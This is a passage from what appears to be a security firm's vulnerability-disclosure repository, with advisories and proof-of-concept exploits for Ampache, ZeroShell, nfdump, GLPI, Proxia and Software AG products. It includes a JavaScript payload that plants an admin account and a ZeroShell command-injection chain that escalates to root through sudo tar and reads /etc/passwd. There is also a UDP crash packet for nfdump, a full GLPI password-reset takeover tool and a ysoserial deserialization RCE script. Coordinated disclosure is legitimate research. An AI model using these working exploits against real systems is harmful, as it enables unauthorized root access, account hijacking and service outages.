 * throw. The form is selected by index ([2]) and the field names
 * (username, email, password_1, password_2, access) are taken from
 * Ampache's admin/users.php page, so any change to that page layout breaks
 * the script. NOTE(review): "access" = "100" is presumably the admin level
 * (the README speaks of a "privileged user"); not verifiable from this file.
 */
function pwned() {
    var ifr = document.getElementById("pwn");
    var target = ifr.contentDocument.getElementsByTagName("form")[2];
    target.username.value = "NewAdmin";
    target.email.value = "myemail@tarlogic.foobar";
    target.password_1.value = "admin";
    target.password_2.value = "admin";
    target.access.value = "100";
    target.submit();
}
// Load the admin "add user" page in an iframe and call pwned() after a
// fixed 3 s delay. "[AMPACHE]" is a placeholder for the target host.
// The timeout is a race with the page load: on a slow server the form is
// not there yet and pwned() throws. From the defender's side the resulting
// request is an ordinary admin user-creation POST, distinguishable only by
// the fixed values above and by the Referer/Origin of the admin's session.
var iframe = document.createElement('iframe');
iframe.setAttribute("src", "https://[AMPACHE]/admin/users.php?action=show_add_user");
iframe.setAttribute("id", "pwn");
document.body.appendChild(iframe);
setTimeout(pwned, 3000);
27 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12725/CVE-2019-12725.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # CVE-2019-12725 - Remote Command Execution as Root
4 | #
5 | # Software: ZeroShell <= 3.9.0
6 | # Author: Juan Manuel Fernandez (@TheXC3LL) from BlackArrow
7 | # Details: https://github.com/blackarrowsec/advisories/2019/CVE-2019-12725
8 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
9 | #
10 |
11 |
12 | import requests
13 | import sys
14 |
# Usage: CVE-2019-12725.py <base-url>. sys.argv[1] is read unchecked, so a
# missing argument raises IndexError before any request is made.
target = sys.argv[1]
# Command placed into the injection; it relies on the sudoers entry for
# /bin/tar quoted in the README (tar's --checkpoint-action runs "id").
payload = "/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=id"
# The x509type parameter is where the new-line (%0a) delimited injection
# lands; Section=NoAuthREQ is the unauthenticated path per the README.
poc = "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a" + payload + "%0a'"

# Also vulnerable: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type='%0acat /etc/passwd%0a'
# And: /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat /etc/passwd%0a'&PW=
# It is the same vulnerability as https://www.exploit-db.com/exploits/41040, but the fix is bypassed using %0a

# Plain GET with requests' defaults (no timeout, certificate verification on).
req = requests.get(target + poc)
# rindex("") returns len(req.text), so this prints the first half of the
# body (Python 2 integer division). NOTE(review): an HTML tag between the
# quotes was probably lost when this listing was extracted -- confirm
# against the repository file.
print req.text[:req.text.rindex("") / 2]
25 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12725/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-12725: Remote Command Execution in ZeroShell
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ ZeroShell
6 | __Vendor URL:__ https://zeroshell.org
7 | __Versions affected:__ ZeroShell <= 3.9.0
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-12725/CVE-2019-12725.py))
11 |
12 | ## Summary
13 | ZeroShell 3.9.0 (and before) is vulnerable to RCE because some parameters sent to the endpoint are used by a bash script without proper sanitization.
14 |
15 | ## Details
16 |
17 | An unauthenticated attacker can execute arbitrary commands via command injection with new-line characters:
18 | ```
19 | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509view&User=Admin&x509type='%0Auname -a%0A'
20 | ```
21 |
22 | Additionally the Apache user can execute the "tar" command as root (/etc/sudoers):
23 | ```
24 | (...)
25 | apache ALL= NOPASSWD: /bin/tar
26 | (...)
27 | ```
28 |
29 | This can be abused in order to elevate privileges via the RCE:
30 |
31 | ```
32 | /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=id%0A'
33 |
34 | uid=0(root) gid=0(root) groups=0(root)
35 | ```
36 | ## Impact
37 |
38 | An unauthenticated attacker can execute commands remotely as root.
39 |
40 | ## Recommendation
41 | Update to the latest version.
42 |
43 | ## Timeline
44 | * 29/05/2019 - Reported the vulnerability to vendor
45 | * 29/05/2019 - Vendor ACK
46 | * 05/06/2019 - CVE Identifier (CVE-2019-12725) assigned by MITRE
47 | * 04/08/2019 - Security Release with fix (ZeroShell 3.9.3)
48 |
49 | #
50 |
51 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
52 |
--------------------------------------------------------------------------------
/2019/CVE-2019-14459/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-14459: Denial of Service in Nfdump
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ Peter Haag
6 | __Vendor URL:__ https://github.com/phaag/nfdump
7 | __Versions affected:__ Nfdump <= 1.6.17
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-14459/))
11 |
12 | ## Summary
13 | nfdump 1.6.17 and earlier is affected by an integer overflow in the function Process_ipfix_template_withdraw in ipfix.c that can be abused in order to crash the process remotely (denial of service).
14 |
15 | ## Details
16 |
17 | An integer overflow in this function can be abused in order to crash the process remotely (denial of service). The function `Process_ipfix_template_withdraw` uses size_left as uint32_t, which is an unsigned integer, so if size_left has the value 1, when the subtraction at line 1429 is done (`size_left -= 4;`) it will wrap around and become 4294967293 (0xfffffffd). As this value is higher than 4, the size check made at line 1443 (`if ( size_left < 4 ){(...) size_left = 0; (...)}`) will be bypassed. At this point we have a huge loop (`while ( size_left )`) in which the pointer DataPtr is increased by 4 in each iteration until it reaches an invalid memory address and segfaults.
18 |
19 | ```
20 | import socket
21 | import sys
22 |
23 | packet = [
24 | 0x00, 0x0a, 0xc8, 0xc9, 0x00, 0x00, 0x0a, 0x20,
25 | 0x00, 0x5d, 0x53, 0x64, 0x02, 0x00, 0x00, 0x03,
26 | 0x00, 0x02, 0x00, 0x05, 0x11, 0x00
27 | ]
28 |
29 | exploit = ""
30 | for x in packet:
31 | exploit += chr(x)
32 |
33 | print "[*] Nfcapd DoS - Integer Overflow at Process_ipfix_template_withdraw()"
34 | print "[*] Rocket to: %s:%s" % (sys.argv[1], sys.argv[2])
35 |
36 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
37 | sock.sendto(exploit, (sys.argv[1], int(sys.argv[2])))
38 |
39 | ```
40 |
41 | ## Impact
42 | This vulnerability can be abused to crash the service and generate a Denial of Service.
43 |
44 | ## Recommendation
45 | Update to the latest version.
46 |
47 | ## Timeline
48 | * 07/07/2019 - Reported vulnerability to vendor
49 | * 27/07/2019 - Fixed in Github
50 | * 14/08/2019 - Security Release with fix (Nfdump 1.6.18)
51 |
52 | #
53 |
54 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
55 |
--------------------------------------------------------------------------------
/2019/CVE-2019-14666/CVE-2019-14666.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # CVE-2019-14666 - Account takeover
4 | #
5 | # Software: GLPI <= 9.4.3
6 | # Author: Pablo Martinez (@xassiz) from BlackArrow
7 | # Details: https://github.com/blackarrowsec/advisories/tree/master/2019/CVE-2019-14666
8 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
9 | #
10 |
11 |
12 | import re
13 | import sys
14 | import json
15 | import argparse
16 | import requests
17 |
class GlpiBrowser:
    """Session-holding HTTP client for the CVE-2019-14666 proof of concept (GLPI <= 9.4.3).

    Logs in with an ordinary account, then uses ``ajax/autocompletion.php``
    to read the ``password_forget_token`` column of the ``User`` table, which
    is what turns a normal password reset into a takeover of another
    account (see ``pwn``).

    Python 2 only (``print`` statements). Indentation below is reconstructed
    from a flattened listing.
    """
    def __init__(self, url, user, password):
        """Create the session; no request is sent here.

        :param url: base URL of the GLPI instance, without trailing slash.
        :param user: username for the initial login.
        :param password: password for the initial login.

        TLS certificate verification is switched off for the whole session
        (``verify = False``) and urllib3's warnings are silenced
        process-wide; both weaken transport security globally and are only
        defensible in a throwaway PoC.
        """
        self.url = url
        self.user = user
        self.password = password

        self.session = requests.Session()
        self.session.verify = False
        requests.packages.urllib3.disable_warnings()

    def extract_csrf(self, html):
        """Return the first ``_glpi_csrf_token`` hidden-field value (32 hex chars) in ``html``.

        :raises IndexError: when no token is present; callers wrap this in
            ``try`` and exit.
        """
        return re.findall('name="_glpi_csrf_token" value="([a-f0-9]{32})"', html)[0]

    def get_login_data(self):
        """Fetch the front page and read the login form's field names and CSRF token.

        :return: ``(name_field, pass_field, csrf_token)``.
        :raises IndexError: when any of the three patterns does not match.
        """
        r = self.session.get('{0}'.format(self.url), allow_redirects=True)

        csrf_token = self.extract_csrf(r.text)
        # The input names are read from the id="login_name" /
        # id="login_password" elements rather than hard-coded -- presumably
        # because they vary per page load; not verifiable here.
        name_field = re.findall('name="(.*)" id="login_name"', r.text)[0]
        pass_field = re.findall('name="(.*)" id="login_password"', r.text)[0]

        return name_field, pass_field, csrf_token

    def login(self):
        """Post the local-auth login form with the stored credentials.

        :return: ``True`` when the server answers with a 302 (the only
            success signal used; the redirect target is not inspected).
        :raises SystemExit: status 1 when the form data cannot be read.
        """
        try:
            name_field, pass_field, csrf_token = self.get_login_data()
        except Exception as e:
            # ``e`` is captured but never reported; the line below is all
            # the operator sees.
            print "[-] Login error: could not retrieve form data"
            sys.exit(1)

        data = {
            name_field: self.user,
            pass_field: self.password,
            "auth": "local",
            "submit": "Post",
            "_glpi_csrf_token": csrf_token
        }

        r = self.session.post('{}/front/login.php'.format(self.url), data=data, allow_redirects=False)

        return r.status_code == 302

    def get_data(self, itemtype, field, term=None):
        """Query ``ajax/autocompletion.php`` for ``field`` of ``itemtype``.

        This endpoint is the vulnerable component: per the advisory it
        returns column values for the (itemtype, field) pair the caller
        names without restricting ``field`` to what the user may see.

        :param term: prefix filter; ``None`` is sent as an empty string.
        :return: the decoded JSON body on a 200 response (its shape is not
            validated here; ``pwn`` treats it as an iterable of tokens), or
            ``None`` on any other status or when the body is not JSON.
        """
        params = {
            "itemtype": itemtype,
            "field": field,
            "term": term if term else ""
        }

        r = self.session.get('{}/ajax/autocompletion.php'.format(self.url), params=params)

        if r.status_code == 200:
            try:
                data = json.loads(r.text)
            except:
                # Bare except: a non-JSON body is mapped to None, but so is
                # anything else raised here.
                return None
            return data
        return None

    def get_forget_token(self):
        """Return the ``password_forget_token`` values of the ``User`` table (or ``None``)."""
        return self.get_data('User', 'password_forget_token')

    def get_emails(self):
        """Return the ``email`` values of the ``UserEmail`` table (or ``None``); unused by ``pwn``."""
        return self.get_data('UserEmail', 'email')

    def lost_password_request(self, email):
        """Submit the "forgot password" form for ``email``.

        :return: ``True`` when the response body contains the literal
            ``'An email has been sent'``; presumably a non-English UI never
            matches and is reported as failure.
        :raises SystemExit: status 1 when the CSRF token cannot be read.
        """
        r = self.session.get('{0}/front/lostpassword.php'.format(self.url))
        try:
            csrf_token = self.extract_csrf(r.text)
        except Exception as e:
            print "[-] Lost password error: could not retrieve form data"
            sys.exit(1)

        data = {
            "email": email,
            "update": "Save",
            "_glpi_csrf_token": csrf_token
        }

        r = self.session.post('{}/front/lostpassword.php'.format(self.url), data=data)
        return 'An email has been sent' in r.text

    def change_password(self, email, password, token):
        """Complete the reset form for ``email`` using ``token``.

        :param password: posted twice, as ``password`` and ``password2``;
            a ``None`` value is posted as-is.
        :return: ``True`` when the body contains the literal
            ``'Reset password successful'`` (same language caveat as
            ``lost_password_request``).
        :raises SystemExit: status 1 when the CSRF token cannot be read.
        """
        r = self.session.get('{0}/front/lostpassword.php'.format(self.url), params={'password_forget_token': token})
        try:
            csrf_token = self.extract_csrf(r.text)
        except Exception as e:
            print "[-] Change password error: could not retrieve form data"
            sys.exit(1)

        data = {
            "email": email,
            "password": password,
            "password2": password,
            "password_forget_token": token,
            "update": "Save",
            "_glpi_csrf_token": csrf_token
        }

        r = self.session.post('{}/front/lostpassword.php'.format(self.url), data=data)
        return 'Reset password successful' in r.text

    def pwn(self, email, password):
        """End-to-end flow: log in, snapshot reset tokens, request a reset for ``email``, use the new token.

        :param email: target account's e-mail; when falsy nothing happens
            after the login and the token snapshot.
        :param password: new password to set.
        :return: ``None`` in every case; progress is printed.

        The snapshot taken before the reset request isolates the token
        created by this run: ``res`` is the set difference new - old, so
        tokens that already existed (other pending resets) are ignored.
        """

        if not self.login():
            print "[-] Login error"
            return

        tokens = self.get_forget_token()
        if tokens is None:
            tokens = []

        if email:
            if not self.lost_password_request(email):
                print "[-] Lost password error: could not request"
                return

            new_tokens = self.get_forget_token()

            # NOTE(review): unlike ``tokens`` above, ``new_tokens`` is not
            # guarded against the None that get_data returns on a non-200
            # or non-JSON response; set(None) raises TypeError here.
            res = list(set(new_tokens) - set(tokens))
            if res:
                for token in res:
                    if self.change_password(email, password, token):
                        print "[+] Password changed! ;)"
                        return
142 |
143 |
if __name__ == '__main__':
    # Command-line entry point: each option maps straight onto GlpiBrowser /
    # GlpiBrowser.pwn. --email and --newpass are optional; pwn does nothing
    # past the login and token snapshot when --email is absent.
    options = (
        ("--url", "Target URL", True),
        ("--user", "Username", True),
        ("--password", "Password", True),
        ("--email", "Target email", False),
        ("--newpass", "New password", False),
    )
    cli = argparse.ArgumentParser()
    for flag, description, mandatory in options:
        cli.add_argument(flag, help=description, required=mandatory)

    opts = cli.parse_args()

    browser = GlpiBrowser(opts.url, user=opts.user, password=opts.password)
    browser.pwn(opts.email, opts.newpass)
158 |
--------------------------------------------------------------------------------
/2019/CVE-2019-14666/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-14666: Account takeover in GLPI
2 | []() []() []()
3 |
4 | __Vendor:__ GLPI Project
5 | __Vendor URL:__ https://glpi-project.org/es/
6 | __Versions affected:__ GLPI <= 9.4.3
7 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-14666/CVE-2019-14666.py))
10 |
11 |
12 | ## Summary
13 | GLPI through 9.4.3 is prone to account takeover by abusing the ajax/autocompletion.php autocompletion feature.
14 |
15 | ## Details
16 |
17 | The lack of correct validation leads to recovery of the token generated via the password reset functionality, and thus an authenticated attacker can set an arbitrary password for any user. This vulnerability can be exploited to take control of the admin account. It could also be abused to obtain other sensitive fields like API keys or password hashes.
18 |
19 | ## Impact
20 | This vulnerability can be abused to take control of an administrative account.
21 |
22 | ## Recommendation
23 | Update to the latest version.
24 |
25 | ## Timeline
26 | * 19/07/2019 - Reported vulnerability to vendor
27 | * 24/09/2019 - Security Release with fix (GLPI 9.4.4)
28 |
29 |
30 | #
31 |
32 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2019/CVE-2019-18956/CVE-2019-18956.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #
3 | # CVE-2019-18956 - Remote Code Execution (Java Deserialization) in Proxia Suite, Proxia PHR & SparkSpace
4 | #
5 | # Software:
6 | # Proxia Suite 10.1; < 10.1.5
7 | # Proxia Suite 10.0; < 10.0.32
8 | # Proxia Suite 9; < 9.12.16, 9.11.19, 9.10.26, 9.9.8, 9.8.43 & 9.7.10;
9 | # SparkSpace 1.2; < 1.2.4
10 | # SparkSpace 1.1; < 1.1.2
11 | # SparkSpace 1.0; < 1.0.30
12 | # Proxia PHR 1.1; < 1.1.2
13 | # Proxia PHR 1.0; < 1.0.30
14 | #
15 | # Author: Pablo Martinez (@xassiz) from BlackArrow
16 | # Details: https://github.com/blackarrowsec/advisories/tree/master/2019/CVE-2019-18956
17 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
18 | #
19 |
# Print the usage line on stdout and abort with status 1 (called when the
# argument count is not exactly three).
die_help () {
    local script="${0}"
    printf '%s\n' "Usage: ${script} url ysoserial_payload cmd"
    exit 1
}
24 |
# Exactly three positional arguments are required (url, ysoserial payload
# name, command); anything else prints the usage and exits with status 1.
[ "${#}" -eq "3" ] || die_help


echo "[+] Target: ${1}"
echo "[+] Payload: ${2}"
echo "[+] Cmd: ${3}"

# ysoserial.jar is looked up by relative path (current directory). NUL
# bytes are dropped because a bash string cannot hold them.
PAYLOAD="$(java -jar "ysoserial.jar" "${2}" "${3}" | tr -d '\0')"

# NOTE(review): without 'set -o pipefail' this is the exit status of 'tr',
# the last command of the pipeline, not of java -- a failed ysoserial run
# still reaches the curl below with an empty PAYLOAD.
if [ "${?}" -eq "0" ]
then
    # Cookie value: gzip, then base64 (single line), then '/', '+' and '='
    # swapped for '-', '_' and '.', presumably matching the Base64 variant
    # the servlet decodes (see the README). '-I' sends a HEAD request so only
    # headers are returned; '-k' disables TLS certificate checking.
    curl -I -k "${1}" --cookie "proxia-error=$(gzip <<< "${PAYLOAD}" | base64 -w0 | tr '/' '-' | tr '+' '_' | tr '=' '.')"
fi
38 |
--------------------------------------------------------------------------------
/2019/CVE-2019-18956/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-18956: Remote Code Execution (Java Deserialization) in Proxia Suite, Proxia PHR & SparkSpace
2 | []() []() []()
3 |
4 | __Vendor:__ Divisa iT
5 | __Vendor URL:__ https://www.divisait.com
6 | __Versions affected:__ Multiple versions and products (check the details section to view the full list)
7 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz)), Eloy Perez ([@Zer1t0](https://twitter.com/zer1t0))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-18956/CVE-2019-18956.sh))
10 |
11 |
12 | ## Summary
13 | The dv2eemvc library deserializes a cookie in an unsafe way, leading to remote execution of arbitrary code. Multiple products are affected by the usage of this library.
14 |
15 | ## Details
16 | The method `prepareError` from the `com.divisait.dv2ee.controller.MVCControllerServlet` class is called every time an HTTP request is processed.
17 |
18 | ```java
19 | private void prepareError(Mapping mapping, MultipartRequest request, HttpServletResponse response)
20 | {
21 | String errorAction = HttpUtils.getCookie(request, "proxia-error");
22 | HttpUtils.clearSessionCookie(request, response, "proxia-error");
23 | if (errorAction == null) {
24 | return;
25 | }
26 | try
27 | {
28 | Base64 b64 = new Base64();
29 | byte[] message = b64.decode(errorAction);
30 | ObjectInputStream serin = new ObjectInputStream(new GZIPInputStream(new ByteArrayInputStream(message)));
31 |
32 | HashMap toReturn = (HashMap)serin.readObject();
33 | serin.close();
34 | if (!toReturn.isEmpty())
35 | {
36 | Iterator> key = toReturn.keySet().iterator();
37 | while (key.hasNext())
38 | {
39 | String entry = (String)key.next();
40 | Object data = toReturn.get(entry);
41 | request.setAttribute(entry, data);
42 | }
43 | }
44 | }
45 | catch (Exception e) {}
46 | ```
47 |
48 | This method insecurely deserializes the contents of the `proxia-error` cookie, so an attacker can manipulate it in order to achieve arbitrary code execution.
49 |
50 | The vendor provided us with the complete list of affected versions:
51 |
52 | __Lib versions:__
53 | * dv2eemvc-17; releases between dv2eemvc-17-62 and dv2eemvc-17-147
54 | * dv2eemvc-18.6; releases < 18.6.42
55 | * dv2eemvc-19.0; releases < 19.0.13
56 | * dv2eemvc-19.1; releases < 19.1.19
57 | * dv2eemvc-19.2; releases < 19.2.41
58 | * dv2eemvc-19.3; releases < 19.3.37
59 | * dv2eemvc-19.4; releases < 19.4.13
60 | * dv2eemvc-20.0; releases < 20.0.13
61 |
62 | __Product versions:__
63 | * Proxia Suite 10.1; < 10.1.5
64 | * Proxia Suite 10.0; < 10.0.32
65 | * Proxia Suite 9; < 9.12.16, 9.11.19, 9.10.26, 9.9.8, 9.8.43 & 9.7.10;
66 | * SparkSpace 1.2; < 1.2.4
67 | * SparkSpace 1.1; < 1.1.2
68 | * SparkSpace 1.0; < 1.0.30
69 | * Proxia PHR 1.1; < 1.1.2
70 | * Proxia PHR 1.0; < 1.0.30
71 |
72 | ## Impact
73 | This vulnerability can be used to execute code in the server.
74 |
75 | ## Recommendation
76 | Update to the latest version.
77 |
78 | ## Timeline
79 | * 29/10/2019 - Vulnerability reported to vendor
80 | * 30/10/2019 - (9:31) ACK from vendor
81 | * 30/10/2019 - (13:37) Vendor fixes the issue and releases new versions of the affected products (_the mail actually arrived at 13:36_)
82 |
83 |
84 | #
85 |
86 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
87 |
--------------------------------------------------------------------------------
/2020/CVE-2020-12606/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-12606: SQL injection in SGLAC
2 | []() []() []()
3 |
4 | __Vendor:__ DBSOFT
5 | __Vendor URL:__ http://www.dbsoft.es/es-es/productos/sglac.aspx
6 | __Versions affected:__ SGLAC <20.05.001
7 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | SGLAC web frontend (<20.05.001) is prone to an unauthenticated SQL injection.
15 |
16 | ## Details
17 |
18 | The ProcedimientoGenerico method in the SVCManejador.svc webservice of the SGLAC web frontend allows an attacker to run arbitrary SQL commands on the SQL Server.
19 |
20 | ## Impact
21 |
22 | Command execution can be easily achieved by using the xp_cmdshell stored procedure.
23 |
24 | ## Recommendation
25 | Update to a fixed version (>= 20.05.001).
26 |
27 | ## Timeline
28 | * 28/04/2020 - Vendor contact
29 | * 27/05/2020 - Release of fixed version
30 |
31 |
32 | #
33 |
34 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
35 |
--------------------------------------------------------------------------------
/2020/CVE-2020-28657/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-28657: Multiple SQL injections in bPanel2
2 | []() []() []()
3 |
4 | __Vendor:__ bittacora
5 | __Vendor URL:__ https://bittacora.com/
6 | __Versions affected:__ bPanel2
7 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | bPanel2 is prone to multiple unauthenticated SQL injections.
15 |
16 | ## Details
17 |
18 | The administrative ajax endpoints (aka ajax/aj_*.php), which are accessible without authentication, are affected by SQL injections.
19 |
20 | ## Impact
21 |
22 | This could lead to platform compromise, by dumping and cracking administrative password hashes.
23 |
24 | ## Recommendation
25 | Update to a fixed version (>2).
26 |
27 | ## Timeline
28 | * 12/11/2020 - Reported vulnerability to vendor
29 | * 18/11/2020 - Vendor acknowledges the issue, but says that it's already fixed in newer versions
30 | * 02/03/2021 - Public disclosure
31 |
32 |
33 | #
34 |
35 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
36 |
--------------------------------------------------------------------------------
/2020/CVE-2020-35577/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-35577: IDOR in Endalia Selection Portal
2 | []() []() []()
3 |
4 | __Vendor:__ Endalia
5 | __Vendor URL:__ https://www.endalia.com/software/seleccion/
6 | __Versions affected:__ Endalia Selection Portal < 4.205.0
7 | __Discovered by:__ Antón Ortigueira ([@antuache](https://twitter.com/antuache))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | Endalia Selection Portal (< 4.205.0) is prone to an authenticated Insecure Direct Object Reference (IDOR).
15 |
16 | ## Details
17 |
18 | An IDOR vulnerability allows any authenticated user to download private files uploaded by other users, by changing the value of the file identifier in a __CommonDownload__ request.
19 |
20 | ## Impact
21 |
22 | Sensitive user data such as bank details or identification documents are stored on this platform. An attacker could download them by registering a user account.
23 |
24 | ## Recommendation
25 |
26 | Update to a fixed version (>= 4.205.0).
27 |
28 | ## Timeline
29 | * 12/11/2020 - Vendor contact
30 | * 24/11/2020 - Release of fixed version
31 | * 18/02/2021 - Public disclosure
32 |
33 |
34 | #
35 |
36 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
37 |
--------------------------------------------------------------------------------
/2021/CVE-2021-33207/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-33207: Remote Code Execution (Java Deserialization)
2 | []() []() []()
3 |
4 | __Vendor:__ Software AG
5 | __Vendor URL:__ https://www.softwareag.com/corporate/products/az/mashzone_nextgen/default
6 | __Versions affected:__ MashZone NextGen 10.7 GA | Build 1607 (Vendor did not provide data about other affected versions)
7 | __Discovered by:__ Marcos Díaz
8 | __Public fix:__ No
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | MashZone NextGen 10.7 GA | Build 1607, and likely other/older versions, are affected by insecure Java object deserialization.
15 |
16 | ## Details
17 |
18 | The method `errorResponse` from the class `com.idsscheer.ppmmashup.io.util.ZHttpRequestHelper` performs an insecure Java deserialization of the body of a specially crafted HTTP response.
19 |
20 | ## Impact
21 |
22 | Command execution can be achieved by forcing the application to make an HTTP request to a server controlled by an attacker.
23 |
24 | ## Recommendation
25 | Make sure you have changed the default administrative credentials. At this point we do not have information about a fix from Software AG.
26 |
27 | ## Timeline
28 | * 19/05/2021 - Reported vulnerability to vendor
29 | * 31/08/2021 - A representative from Software AG asks for details
30 | * 30/03/2022 - Public Disclosure
31 |
32 | ------
33 |
34 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
35 |
--------------------------------------------------------------------------------
/2021/CVE-2021-33208/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-33208: XML External Entity (XXE)
2 | []() []() []()
3 |
4 | __Vendor:__ Software AG
5 | __Vendor URL:__ https://www.softwareag.com/corporate/products/az/mashzone_nextgen/default
6 | __Versions affected:__ MashZone NextGen 10.7 GA | Build 1607 (Vendor did not provide data about other affected versions)
7 | __Discovered by:__ Marcos Díaz
8 | __Public fix:__ No
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | MashZone NextGen 10.7 GA | Build 1607, and likely other/older versions, are affected by an XXE vulnerability.
15 |
16 | ## Details
17 |
18 | MashZone NextGen uses an XML file to set up a feature called "Ehcache". It is possible to include XML external entities in this file, which are evaluated by the application's XML parser.
19 |
20 | ## Impact
21 |
22 | Leak of internal files / DoS / SSRF.
23 |
24 | ## Recommendation
25 |
26 | Make sure you have changed the default administrative credentials. At this point we do not have information about a fix from Software AG.
27 |
28 | ## Timeline
29 |
30 | * 19/05/2021 - Reported vulnerability to vendor
31 | * 31/08/2021 - A representative from Software AG asks for details
32 | * 30/03/2022 - Public Disclosure
33 |
34 | ------
35 |
36 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
37 |
--------------------------------------------------------------------------------
/2021/CVE-2021-33523/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-33523: Remote Code Execution (new JDBC driver)
2 | []() []() []()
3 |
4 | __Vendor:__ Software AG
5 | __Vendor URL:__ https://www.softwareag.com/corporate/products/az/mashzone_nextgen/default
6 | __Versions affected:__ MashZone NextGen 10.7 GA | Build 1607 (Vendor did not provide data about other affected versions)
7 | __Discovered by:__ Marcos Díaz
8 | __Public fix:__ No
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | MashZone NextGen 10.7 GA | Build 1607, and likely other/older versions, are affected by a remote code execution vulnerability.
15 |
16 | ## Details
17 |
18 | MashZone NextGen allows an administrator to install a new **JDBC driver**. This feature can be abused to execute arbitrary commands on the underlying host or deploy a webshell.
19 |
20 | ## Impact
21 |
22 | This vulnerability can be used to execute code on the server.
23 |
24 | ## Recommendation
25 |
26 | Make sure you have changed the default administrative credentials. At this point we do not have information about a fix from Software AG.
27 |
28 | ## Timeline
29 | * 19/05/2021 - Reported vulnerability to vendor
30 | * 31/08/2021 - A representative from Software AG asks for details
31 | * 30/03/2022 - Public Disclosure
32 |
33 | ------
34 |
35 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
36 |
--------------------------------------------------------------------------------
/2021/CVE-2021-33581/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-33581: Server Side Request Forgery (SSRF)
2 | []() []() []()
3 |
4 | __Vendor:__ Software AG
5 | __Vendor URL:__ https://www.softwareag.com/corporate/products/az/mashzone_nextgen/default
6 | __Versions affected:__ MashZone NextGen 10.7 GA | Build 1607 (Vendor did not provide data about other affected versions)
7 | __Discovered by:__ Marcos Díaz
8 | __Public fix:__ No
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | MashZone NextGen 10.7 GA | Build 1607, and likely other/older versions, are affected by an SSRF.
15 |
16 | ## Details
17 |
18 | The HTTP endpoint `/mashzone/mzservices/admin/getppmversion` parameter `url` performs HTTP connections to arbitrary URLs.
19 |
20 | ## Impact
21 |
22 | This vulnerability can be used in combination with **CVE-2021-33207** to achieve RCE.
23 |
24 | ## Recommendation
25 | Make sure you have changed the default administrative credentials. At this point we do not have information about a fix from Software AG.
26 |
27 | ## Timeline
28 | * 19/05/2021 - Reported vulnerability to vendor
